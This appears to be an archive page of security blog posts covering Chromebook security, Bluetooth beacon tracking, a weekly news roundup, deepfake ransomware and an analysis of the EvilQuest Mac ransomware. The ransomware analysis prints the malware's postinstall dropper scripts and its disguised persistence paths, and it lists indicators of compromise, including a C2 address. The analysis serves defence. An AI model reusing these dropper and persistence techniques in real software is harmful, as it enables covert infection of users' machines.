Archive for NEWS

Do Chromebooks need antivirus protection?

The supervisor handed Jim a Chromebook and said: “Take this home with you and use it to send me updates. We want to minimize the number of visits to the office—anything you can do from home helps keep this place safer. When the pandemic is over, I’d like to have it back in one piece, if possible.”

Jim is great at his job, but his reputation with technology skills is somewhat lacking. This should be an interesting experiment.

The Chromebook Jim’s supervisor hands him is a low-level laptop running ChromeOS. Because of the minimum hardware requirements for ChromeOS, these laptops are usually a lot cheaper than those running Windows or macOS. Bonus: Chromebooks are user-friendly, so folks with less technical savvy can still navigate with ease.

Not all jobs allow for working from home (WFH)—some have to visit clients or building sites. But for those who can, a Chromebook can be an ideal solution for employers to hand out. They are cheap, fast, and as long as you don’t need any complex or specific software to run on them, they can be used for any web-based and administrative tasks, such as reading and sending email, creating progress reports, and preparing information for the billing department.

Chromebook security

Chromebooks are supposed to come with sufficient, built-in security. But is that really true? Can you use a Chromebook without having to think twice about general cybersecurity and anti-malware protection in particular? Or do you need Chromebook antivirus? Let’s have a look first at which security features are pre-packed in ChromeOS.

The built-in security features of ChromeOS include:

  • Automatic updating: This is a good feature. No argument there. But it says nothing about the frequency of updates or about how fast updates will become available to counter zero-day vulnerabilities.
  • Sandboxing: Sandboxing is a method to limit the impact of an infection. The idea is that when you close an app or website, the related infection will be gone. While this might be true in most cases, it’s wishful thinking to believe malware authors would be unable to “escape” the sandbox.
  • Verified boot: This is a check done when the system starts up to verify that it hasn’t been tampered with. But this check does not work when the system is set to Developer Mode.
  • Encryption: This is an excellent feature that prevents criminals from retrieving data from a compromised, stolen or lost laptop, but it does not protect the system against malware.
  • Recovery: Recovery is an option that you can use to restore the Chromebook to a previous state. While this could get rid of malware, it might also delete important data in the process.

While Chromebooks have several built-in security features, none of them are full-proof. The danger is minimized by design, but any motivated cybercriminal could find their way around the checks put in place.

Additional Chromebook security risks

There are some additional arguments that could be made against using a Chromebook antivirus program. Chromebooks can download and run Android apps in emulated mode, which increases their security risk. But additional security protocols should prevent this feature from being exploited. These include the following:

  • The Play Store and Web Store both check the apps before they are admitted. While this may stop many blatant forms of malware, we find a fair amount of adware and potentially unwanted programs in these stores every day. And now and then, more malicious security threats make their way into the Play Store. And then there is the fact that many users will be tempted to install apps that are not available in the Play or Web Stores (yet).
  • Administrator permissions for malware are impossible to get on a Chromebook. While this is true, it does not mean that malware can’t get nasty without these permissions. As we have discussed in our blog on how Chromebooks can and do get infected, there are many examples of malware for Chromebooks that are annoying enough without the need to be elevated.
  • Chromebooks are not interesting for malware authors. Again, this may have been true at some point, but the more Chromebooks are out there, the bigger their target audience and the more appealing to focus on that group.

All in all, Chromebook virus protection may not be necessary yet, but there is plenty of malware going around that could ruin your Chromebook experience.

Beware of trusting the OS too much

As we have heard in the past (Macs don’t get infected!), some platforms have reputations for being safer even when the truth is the opposite. For example, this year, Mac malware outpaced Windows malware 2:1.

Windows machines still dominate the market share and tend to have more security vulnerabilities, which have for years made them the bigger and easier target for hackers. But as Apple’s computers have grown in popularity, hackers appear to be focusing more of their attention on the versions of macOS that power them. There is a good chance that with the growing popularity of ChromeOS-based systems, the same will happen in that field.

And the browser

And let’s not forget the weak spot of any OS: its browser. Just the other day, Google removed 106 extensions that were found spying on users. These extensions were all published by the same criminals and were found illegally collecting sensitive user data as part of a massive global surveillance campaign.

Awake Security, which disclosed the findings late last week, said the malicious browser add-ons were tied back to a single Internet domain registrar, GalComm.

This campaign and the Chrome extensions involved performed operations such as taking screenshots of the victim device, loading malware, reading the clipboard, and actively harvesting tokens and user input.

Our advice is that the malware out there today is obtrusive enough to warrant installing extra protection on any device, including a Chromebook. As Chromebooks gain in popularity, cybercriminals will look to profit from them, too. Better to be safe and prepared than to be caught asleep at the laptop.

Stay safe, everyone!

The post Do Chromebooks need antivirus protection? appeared first on Malwarebytes Labs.

Posted in: NEWS

Leave a Comment (0) →

New Mac ransomware spreading through piracy

A Twitter user going by the handle @beatsballert messaged me yesterday after learning of an apparently malicious Little Snitch installer available for download on a Russian forum dedicated to sharing torrent links. A post offered a torrent download for Little Snitch, and was soon followed by a number of comments that the download included malware. In fact, we discovered that not only was it malware, but a new Mac ransomware variant spreading via piracy.

RUTracker post showing magnet link to malicious installer

Installation

Analysis of this installer showed that there was definitely something strange going on. To start, the legitimate Little Snitch installer is attractively and professionally packaged, with a well-made custom installer that is properly code signed. However, this installer was a simple Apple installer package with a generic icon. Worse, the installer package was pointlessly distributed inside a disk image file.

Malicious Little Snitch installer

Examining this installer revealed that it would install what turned out to be the legitimate Little Snitch installer and uninstaller apps, as well as an executable file named “patch”, into the /Users/Shared/ directory.

Files installed

The installer also contained a postinstall script—a shell script that is executed after the installation process is completed. It is normal for this type of installer to contain preinstall and/or postinstall scripts, for preparation and cleanup, but in this case the script was used to load the malware and then launch the legitimate Little Snitch installer.

!/bin/sh
mkdir /Library/LittleSnitchd

mv /Users/Shared/Utils/patch /Library/LittleSnitchd/CrashReporter
rmdir /Users/Shared/Utils

chmod +x /Library/LittleSnitchd/CrashReporter

/Library/LittleSnitchd/CrashReporter
open /Users/Shared/LittleSnitchInstaller.app &

The script moves the patch file into a location that appears to be related to LittleSnitch and renames it to CrashReporter. As there is a legitimate process that is part of macOS named Crash Reporter, this name will blend in reasonably well if seen in Activity Monitor. It then removes itself from the /Users/Shared/ folder and launches the new copy. Finally, it launches the Little Snitch installer.

In practice, this didn’t work very well. The malware got installed, but the attempt to run the Little Snitch installer got hung up indefinitely, until I eventually forced it to quit. Further, the malware didn’t actually start encrypting anything, despite the fact that I let it run for a while with some decoy documents in position as willing victims.

While waiting for the malware to do something—anything!—further investigation turned up an additional malicious installer, for some DJ software called Mixed In Key 8, as well as hints that a malicious Ableton Live installer also exists (although such an installer has not yet been found). There are undoubtedly other installers floating around as well that have not been seen.

The Mixed In Key installer turned out to be quite similar, though with slightly different file names and postinstall script.

!/bin/sh
mkdir /Library/mixednkey

mv /Applications/Utils/patch /Library/mixednkey/toolroomd
rmdir /Application/Utils

chmod +x /Library/mixednkey/toolroomd

/Library/mixednkey/toolroomd &

This one did not include code to launch a legitimate installer, and simply dropped the Mixed In Key app into the Applications folder directly.

Infection

Once the infection was triggered by the installer, the malware began spreading itself quite liberally around the hard drive. Both variants installed copies of the patch file at the following locations:

/Library/AppQuest/com.apple.questd
/Users/user/Library/AppQuest/com.apple.questd
/private/var/root/Library/AppQuest/com.apple.questd

It also set up persistence via launch agent and daemon plist files:

/Library/LaunchDaemons/com.apple.questd.plist
/Users/user/Library/LaunchAgents/com.apple.questd.plist
/private/var/root/Library/LaunchAgents/com.apple.questd.plist

The latter in each group of files, found in /private/var/root/, is likely to be due to a bug in the code that creates the files in the user folder, leading to creation of the files in the root user’s folder. Since it’s quite rare for anyone to actually log in as root, this doesn’t serve any practical purpose.

Strangely, the malware also copied itself to the following files:

/Users/user/Library/.ak5t3o0X2
/private/var/root/Library/.5tAxR3H3Y

The latter was identical to the original patch file, but the former was modified in a very strange way. It contained a copy of the patch file, with a second copy of the data from that file appended to the end, followed by an additional 9 bytes: the hexidecimal string 03705701 00CEFAAD DE. It is not yet known what the purpose of these files or this additional appended data is.

Even more bizarre—and still inexplicable—was the fact that the malware also modified the following files:

/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/crashpad_handler
/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/GoogleSoftwareUpdateDaemon
/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin
/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksdiagnostics
/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksfetch
/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksinstall

These files are all executable files that are part of GoogleSoftwareUpdate, which are most commonly found installed due to having Google Chrome installed on the machine. These files had the content of the patch file prepended to them, which of course would mean that the malicious code would run when any of these files is executed. However, Chrome will see that the files have been modified, and will replace the modified files with clean copies as soon as it runs, so it’s unclear what the purpose here is.

Behavior

The malware installed via the Mixed In Key installer was similarly reticent to start encrypting files for me. I left it running on a real machine for some time with no results, then started playing with the system clock. After setting it ahead three days, disconnecting from the network, and restarting the computer a couple times, it finally began encrypting files.

The malware wasn’t particularly smart about what files it encrypted, however. It appeared to encrypt a number of settings files and other data files, such as the keychain files. This resulted in an error message when logging in post-encryption.

Error displayed after the keychain was encrypted by the ransomware

There were other very obvious indications of error, such as the Dock resetting to its default appearance.

The Finder also began showing signs of trouble, with spinning beachballs frequently appearing when selecting an encrypted file. Other apps would also freeze periodically, but the Finder freezes could only be managed by force quitting the Finder.

Although others have reported that a file is created with instructions on paying the ransom, as well as an alert shown, and even text-to-speech used to inform the user they have been infected with ransomware, I was unable to duplicate any of these, despite waiting quite a while for the ransomware to finish.

Screenshot of encryption message posted to RUTracker forum

Capabilities

The malware includes some anti-analysis techniques, found in functions named is_debugging and is_virtual_mchn. This is common with malware, as having a debugger attached to the process or being run inside a virtual machine are both indications that a malware researcher is analyzing it. In such cases, malware will typically not display its full capabilities.

In a blog post on Objective-See, Patrick Wardle outlined the details of how these two routines work. The is_virtual_mchn function actually does not appear to check to see if the malware is running in a virtual machine, but rather tries to catch a VM in the process of adjusting time. It’s not unusual for malware to include delays. For example, the first ever Mac ransomware, KeRanger, included a three day delay between when it infected the system and when it began encrypting files. This helps to disguise the source of the malware, as the malicious behavior may not be immediately associated with a program installed three days before.

This, plus the fact that the malware includes functions with names like ei_timer_create, ei_timer_start, and ei_timer_check, probably means that the malware runs on a time delay, although it’s not yet known what that delay is.

Patrick also points out that the malware appears to include a keylogger, due to presence of calls to CGEventTapCreate, which is a system routine that allows for monitoring of events like keystrokes. What the malware does with this capability is not known. It also opens a reverse shell to a command and control (C2) server.

Open questions

There are still a number of open questions that will be answered through further analysis. For example, what kind of encryption does this malware use? Is it secure, or will it be easy to crack (as in the case of decrypting files encrypted by the FindZip ransomware)? Will it be reversible, or is the encryption key never communicated back to the criminals behind it (also like FindZip)?

There’s still more to be learned, and we will update this post as more becomes known.

Post-infection

If you get infected with this malware, you’ll want to get rid of it as quickly as possible. Malwarebytes for Mac will detect this malware as Ransom.OSX.EvilQuest and remove it.

If your files get encrypted, we’re not sure how dire a situation that is. It depends on the encryption and how the keys are handled. It’s possible that further research could lead to a method for decrypting files, and it’s also possible that won’t happen.

The best way of avoiding the consequences of ransomware is to maintain a good set of backups. Keep at least two backup copies of all important data, and at least one should not be kept attached to your Mac at all times. (Ransomware may try to encrypt or damage backups on connected drives.)

I personally have multiple hard drives for backups. I use Time Machine to maintain a couple, and Carbon Copy Cloner to maintain a couple more. One of the backups is always in the safe deposit box at the bank, and I swap them periodically, so that worst case scenario, I always have reasonably recent data stored in a safe location.

If you have good backups, ransomware is no threat to you. At worst, you can simply erase the hard drive and restore from a clean backup. Plus, those backups also protect you against things like drive failure, theft, destruction of your device, etc.

Indicators of Compromise

Files

patch (and com.apple.questd)
5a024ffabefa6082031dccdb1e74a7fec9f60f257cd0b1ab0f698ba2a5baca6b

Little Snitch 4.5.2.dmg
f8d91b8798bd9d5d348beab33604a540e13ce40b88adc096c8f1b3311187e6fa

Mixed In Key 8.dmg
b34738e181a6119f23e930476ae949fc0c7c4ded6efa003019fa946c4e5b287a

Network

C2 server 167.71.237.219
C2 address obtained from andrewka6.pythonanywhere[.]com

The post New Mac ransomware spreading through piracy appeared first on Malwarebytes Labs.

Posted in: NEWS

Leave a Comment (0) →

Bluetooth beacons: one free privacy debate with your next order

Apps and their permissions have been in the news recently, particularly in relation to tracking/privacy issues and Bluetooth. Why Bluetooth, though? What is it, and what is it doing to raise concerns in some security quarters?

Bluetooth: your cool, then uncool, but mostly cool again cousin

Bluetooth has had a slightly odd reputation down the years. Pre-smart phones, for many people it was “that thing enabled by default, which you can also use to transfer photographs incredibly slowly.” When smart phones came around, it was relegated to “that thing enabled by default, but I’ll turn it off because I have Wi-Fi.”

Bluetooth technology actually has a lot of applications. It’s a short-range wireless communications protocol which doesn’t deserve its occasionally uncool reputation. Its limited range stops it from killing your battery, and from a security standpoint, it’s quite tricky to deliberately attack someone’s mobile device when everything hinges on a target being in a small space at a specific time.

If you want to send contacts or videos to someone, tether devices, talk to people safely while in a car, or even just fire up some wire-free headphones in the gym without hassle, Bluetooth is the place to be. That’s not to say people can’t do bad things with it, of course.

Apple’s AirDrop, which made use of Bluetooth, was caught up in some unsolicited message chaos back in 2018. Bluejacking did similar things and has been around for a long time. Bluetooth isn’t 100 percent secure, but then nothing is. There are multiple steps you can take to lock Bluetooth down, with the caveat that it works best by being open and accessible most of the time.

However, security concerns about Bluetooth are being raised today in the realm of beacon technology.

What is beacon technology?

I’m glad you asked. You likely run into beacons every day without knowing it. For clarity’s sake, there are many beacon types and we’re not focusing on all of them here. Web beacons, which typically track you across websites or email, are interesting but not our focus here. We’re exploring the kind of beacon located in a store you happen to enter, or even just pass by inside a mall, which sees you coming and helps to serve up (say) some targeted advertising on a billboard or helps ad networks push said ads when you get home in your web browser.

We’ll look at what happens once you step inside the store in a little while, but first we need to figure out how to get you to roll up to my wonderland emporium in the first place. The unexpected first step involves a fence, but not the wooden kind.

Putting up a fence

Geofencing has been around for a good while, and you may have come into contact with it without realizing what it’s called. If you’ve read a more recent “What is this technology?” article, you’ll probably see lots of mentions of advertising, marketing, leading offers, customer satisfaction, and more. You’d assume it was some sort of marketing be-all and end-all, created by Steven P. Advertising, CEO of geolocational advertising services.

That’s not quite the case. 

Geofencing allows you to carve out virtual space around a real area. It’ll help prevent toddlers escaping from a nursery, or stop people wearing an ankle bracelet going on the run. It could alert workers in dangerous environments that they’ve wandered into the danger zone, or help businesses keep curious employees or intruders out of secure areas.

As you’ll be aware, some of this has been around seemingly forever. However, marketing and sales have adopted it as a major method for driving sales. If you go searching online, most of the primary results will be for slick marketing operation dot com as opposed oil rig platform safety dot net.

A trail of breadcrumbs

How do I let you know about my cool store if it’s quite a way off from your current location? I could throw up a chain of geofences along the roads you happen to be traveling down. As you pass through the geofenced area, you might start to receive mobile notifications about the awesome and very cheaply priced goods I’m selling.

Why not think bigger? I could geofence some digital billboards as you go driving past.

From your car, to my store: You may not have intended to pay me a visit when you set out this morning, but those adverts for…let’s say delicious sweet rolls…were too good an opportunity to pass up.

My selection of fences has brought you to the store, and now the in-house beacons will do the rest. Everything from your movement around the building to the products you linger on is now potentially up for grabs. But how do I send you some of those juicy beacon ads or follow you round the store like a digital ghost in the first place? How do I know if you’re lingering in front of my sweet rolls or walking on by to reach something more interesting?

The answer is: I need to introduce your mobile device to my good friend, Bluetooth McBeacon.

Bluetooth McBeacon: your new in-store guide

Well, what is a beacon? It’s most frequently a small, randomly shaped device. Could be a box, it might look like a router, or it could resemble one of those targets you strap to your chest in a game of laser tag. Put simply, it could be pretty much anything. It pulses out an ID and when a phone or other device recognises said ID, they’ll have a sales-based marketing conversation.

How to begin that sales-based marketing conversation?

The most common way for this to happen is to create an app, and include Bluetooth pairing as one of the permissions. If I’m strapped for cash or don’t know where to begin cobbling an app together, I don’t have to; there are multiple third-party apps out there which will pop your content via the beacon.

That’s the app part sorted out. My beacon device will make use of various protocols to howl its ID out into the void. Did you know Google made one of these protocols? How about Apple? It’s a whole new world of void howling.

Anyway, my beacon howls into the void at regular intervals—the shorter the better because it allows for more accurate tracking. When someone running the relevant mobile app wanders into the store, the beacon stops howling and starts hi-fiving as the mobile recognises the beacon ID. One quick permission request later, and we’re officially up and running with our previously mentioned sales-based marketing conversation.

The world is now our marketing oyster, and a barrage of targeted advertising, in-store offers, and even ads for objects you lingered in front of (but didn’t buy) will follow you home as a gentle reminder to maybe pick it up online at a discount. Depending on which ad platforms the beacon owner makes use of, they may be able to plug said platform directly into the beacon’s functionality, which would assist in even more detailed forms of tracking.

These techniques, combined with geofencing for maximum marketing impact, are how stores are pushing you to buy their stock and leading you to a marketing metrics bonanza behind the scenes.

There are many other forms of real-world ad pushing techniques, but in terms of Bluetooth and beacons, they’re a little more accessible and straightforward and this is probably why they’re so present in our everyday lives (even if we don’t realise it).

The future of Bluetooth tracking

Various attempts to make augmented reality shopping aids (dragging and dropping VR furniture into your room so you can see if it fits perfectly, waving your phone around to click on digital coupons as you pick up tins of soup, sales assistants knowing which product you hovered your phone over the longest) haven’t exactly exploded the way developers probably thought.

Nice ideas, but a little convoluted and often not practical. Dropping a router-like device in your store and asking people to download your app for some discounts instead? That is the way to go.

What can I do to avoid Bluetooth tracking?

Whether you’re not keen on election-related Bluetooth antics, or simply don’t want to be followed offline or otherwise by a growing collection of stores and malls, Bluetooth is easy to keep a handle on. Most phone models will have it as a default setting whenever you open your options menu, usually next to Wi-Fi. Don’t want Bluetooth doing its thing? Just turn it off.

If you desperately need to use Bluetooth for something specific, enable then disable right after. Keeping an eye on app permissions at install will help, and of course you should be in the habit of doing that anyway, and not just for Bluetooth. A huge range of apps ask for Bluetooth permissions, but that doesn’t necessarily mean they’re up to no good. As mentioned above, Bluetooth has a ton of valid uses, and even tech directly adjacent to it like ringfencing can be used for entirely useful purposes.

The trick is figuring out what the value proposition for the app is and knowing what its owners intend to do with your data once they have it. If you’re happy with their intentions, feel free to grant permission. If you’re unsure, save the install for another day and do some Internet sleuthing before making a commitment.

Because once your device and identity are plugged into an online/offline marketing profile, you may find it almost impossible to extract yourself. Perhaps it’s better to give that tempting-looking sweet roll store a pass.

The post Bluetooth beacons: one free privacy debate with your next order appeared first on Malwarebytes Labs.

Posted in: NEWS

Leave a Comment (0) →

A week in security (June 22 – 28)

Last week on Malwarebytes Labs, we provided a zero-day guide for 2020 featuring recent attacks and advanced preventive techniques, and we learned how to cough in the face of scammers, offering security tips for the 2020 tax season. We also looked at a web skimmer hiding within EXIF metadata that was exfiltrating credit cards via image files.

In the most recent episode of our podcast Lock and Code, we talked to Matt Davey and Kyle Swank of 1Password about strengthening and forgetting passwords.

Other cybersecurity news

  • Google removed 106 extensions from its Chrome Web Store for collecting sensitive user data as part of a campaign targeting oil and gas, finance, and healthcare sectors. (Source: The Hacker News)
  • DDoSecrets has published BlueLeaks, data from over 200 police departments, law enforcement training, and support resources and fusion centers. (Source: ThreatPost)
  • A sophisticated and well-crafted attack campaign has been hitting unprepared organizations with Nefilim – aka Nephilim – ransomware. (Source: Gov Info Security)
  • An IBM survey found that newly-minted remote workers actually present a significant cybersecurity risk, without being at fault. (Source: IBM Security)
  • Billing information for some clients that was stored in a browser’s cache may have been compromised, Twitter said in an email to business clients. (Source: SC Magazine UK)
  • A European bank suffered the biggest PPS DDoS attack to date, and a new botnet is suspected to be behind the attack. (Source: Bleeping Computer)
  • Researchers discovered a new variant of Lucifer—a hybrid cryptojacking malware—involved in numerous incidents of CVE-2019-9081 exploitation in the wild. (Source: Palo Alto Networks)
  • An online engineer warned people to stay away from Tik-Tok after close investigation revealed intrusive user tracking and other issues. (Source: BoredPanda)
  • Nvidia released a set of security updates to remove vulnerabilities in the Nvidia GPU Display Driver. (Source: ZDNet)
  • Sodinokibi ransomware operators that claimed to have siphoned confidential docs on Nicki Minaj, Mariah Carey, and Lebron James from an American law firm are threatening to auction off the info. (Source: The Register)

Stay safe, everyone!

The post A week in security (June 22 – 28) appeared first on Malwarebytes Labs.

Posted in: NEWS

Leave a Comment (0) →

The face of tomorrow’s cybercrime: Deepfake ransomware explained

While many countries are beginning to ease up on their respective pandemic lock downs—which, in turn, also means that everyone will soon ease into a life that is not quite post-COVID-19—we find ourselves once more on the cusp of change, an outlook that makes some feel anxious and others hopeful.

But for forward-looking security experts, there are some futures they dread and, frankly, would rather un-see. This is because, in the underground market and forums, there is sustained interest in ransomware and the surprisingly cheap offerings of deepfake services to match every cyber miscreant’s campaign of choice. Mash them together and what do you have? Deepfake ransomware.

Cybercrime waiting to happen

News about ransomware continues to be relevant, especially for businesses, its consistent targets. It seems that organizations of all sizes cannot cope, especially now that perimeters have been essentially decimated by remote work. And if you have been paying attention about how cybercrime gangs operate, they don’t keep using the same malicious tools for long. Most of the time, these tools evolve in time and with the crime.

So can you imagine a world where deepfake ransomware is a thing?

“Deepfake ransomware”? Never heard of it.

Granted that this compound word is quite new, the two terms it’s made of are not. But for the sake of review, let’s look at each of these terms so we can get an idea of how they could be related and why they could present a frightening future in cybercrime.

Deepfakes are the manipulation of media, may they be still images and/or videos accompanied by voice, using artificial intelligence (AI), resulting in a believable composite that is challenging to the naked eye and/or software. We’ve touched on the topic of deepfakes in several of our articles here on the Labs blog, including the possibility of such technology being used in scam campaigns.

Ransomware, on the other hand, is malware that holds the victim’s files hostage, either by encrypting important files or locking victims out of certain computer features to prevent them from performing remediation steps, until a ransom is paid.

Combining these two suggests that deepfake tech can be used in ransomware campaigns or vice versa. This is feasible, albeit a bit of a mindbender. To help us understand the concept behind this weird intermarriage, several experts in the field have given us examples of how this concept may look like in practice.

To the best of our knowledge, the term “deepfake ransomware” was first publicly coined by Paul Andrei Bricman, though he opted with a slightly different construction. A student at the University of Groningen specializing in AI and co-founder of not-for-profit REAL (Registrul Educațional Alternativ), he went with the portmanteau “RansomFake” instead, declaring it “the lovechild of ransomware and deepfake.”

Bricman defined RansomFake as “a type of malicious software that automatically generates fake video, which shows the victim performing an incriminatory or intimate action and threatens to distribute it unless a ransom is paid.” Bricman goes on to suggest that the threat actor behind such a campaign would offer up their targets the option to permanently delete the video file after payment is received.

If something like this can be automated, you can bet that more bad actors with little to no background in programming will take interest in such a technology. In a recent report from Trend Micro, it is revealed that there is great interest in how deepfakes could be used for sextortion (or what they call “eWhoring”) or for bypassing authentication protocols that rely on image verification when using certain sites, such as dating sites.

This report also considers deepfake ransomware an emerging threat because it takes extortion-based ransomware to the next level. The scenario they presented is like Bricman’s: threat actor scrapes videos and voice samples of their target from publicly available websites to create a deepfake video—but sprinkling in certain elements inspired from ransomware, such as a countdown timer that lasts for 24-48 hours.

Deepfake ransomware could also happen this way: A threat actor creates deepfake video of their target. Takes screenshots of this video and, pretending to be a legitimate contact of their target, sends them the screenshots and a link to the supposed video that they can watch themselves if they are in doubt.

Curious and perhaps half-convinced, half-scared, the target then clicks the link, gets redirected to the short clip of themselves in a compromising state and all the while, ransomware is being downloaded onto their system. Or, the link may not lead to a purported video after all but to the auto-downloading and execution of a ransomware file. Remember that deepfakes cannot just manipulate videos and voices but still images as well.

This is not an unlikely scenario. In fact, some ransomware threat actor(s) already used a similar tactic back in 2015.

Thankfully, this level of extortion hasn’t been seen in the wild (yet). Nonetheless, the potential for this campaign to destroy a target’s reputation is exceedingly high. It doesn’t really matter whether a video of someone is real or doctored to look real. As humans, we tend to believe what we see, because if you can’t trust your own eyes, what can you trust?

I’m not going to be a likely target, am I?

Never assume you’re not a target. Those who do—individuals, groups, and organizations alike—eventually find themselves at the receiving end of an attack. Worse—they’re not prepared for it. It’s always better to be safe now than sorry in the end.

Is there a way to protect against deepfake ransomware?

For this particular campaign, patching software for vulnerability holes is not needed—although you should be doing this religiously anyway.

A way to counter deepfake ransomware is at the beginning: Do not give cybercriminals the material they need to create something destructive and hold you responsible for. By this we mean watch what you post on social media in general: selfies, group pictures, TikTok videos, and other images are all up for grabs. You should think long and hard about who you’re sharing your content with and where.

Do an audit of your current photos and videos online and who has access to them. Weed out public-facing photos as much as you can or set them to be viewed by certain groups in your pool of contacts. If they’re not photos you posted yourself, simply un-tag yourself, or ask your contact to take them down.

Many call this process of “tidying up” data detoxing, and indeed, it is one of the handful of steps to keep your digital footprint as minimal as possible. This is not only good for your privacy but also for your pocket and sanity.


If you want to read more, Mozilla wrote about it not so long ago here.


When it comes to dealing with messages from people within your network, whether you personally know them or not, if you have other means to reach out to them other than social media platform, do so to verify two things: [a] Are they the person you’re really talking to?, and [b] If they are, did they actually send you those private messages about a purported video of you floating around the web that they found somewhere?

Furthermore, always be suspect of links, especially those purportedly sent by someone you know. Here’s the thing: people are less likely to believe a stranger who is just “being nice” than someone they may know personally and is concerned about them. Cybercriminals know this, too. And they will do whatever they can to make you believe the scammery they’re attempting to pull on you.

Lastly, backup your files. Always.

The post The face of tomorrow’s cybercrime: Deepfake ransomware explained appeared first on Malwarebytes Labs.

Posted in: NEWS

Leave a Comment (0) →
Page 1 of 27 12345...»